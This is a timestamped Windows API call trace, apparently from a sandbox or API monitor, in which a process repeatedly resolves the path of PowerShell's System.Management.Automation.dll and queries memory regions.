	[0336.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.797] VirtualQuery (in: lpAddress=0x26b180, lpBuffer=0x26c040, dwLength=0x30 | out: lpBuffer=0x26c040*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.798] VirtualQuery (in: lpAddress=0x26b210, lpBuffer=0x26c0d0, dwLength=0x30 | out: lpBuffer=0x26c0d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.799] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.801] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.802] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.803] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.803] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.803] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b5c0, lpBuffer=0x26c480, dwLength=0x30 | out: lpBuffer=0x26c480*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.804] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.805] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.805] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.805] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0336.805] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x6af356f3, Data2=0x69cd, Data3=0x4dca, Data4=([0]=0x87, [1]=0x72, [2]=0x7e, [3]=0xec, [4]=0x15, [5]=0x93, [6]=0xa7, [7]=0x51))) returned 0x0
	[0336.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0336.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
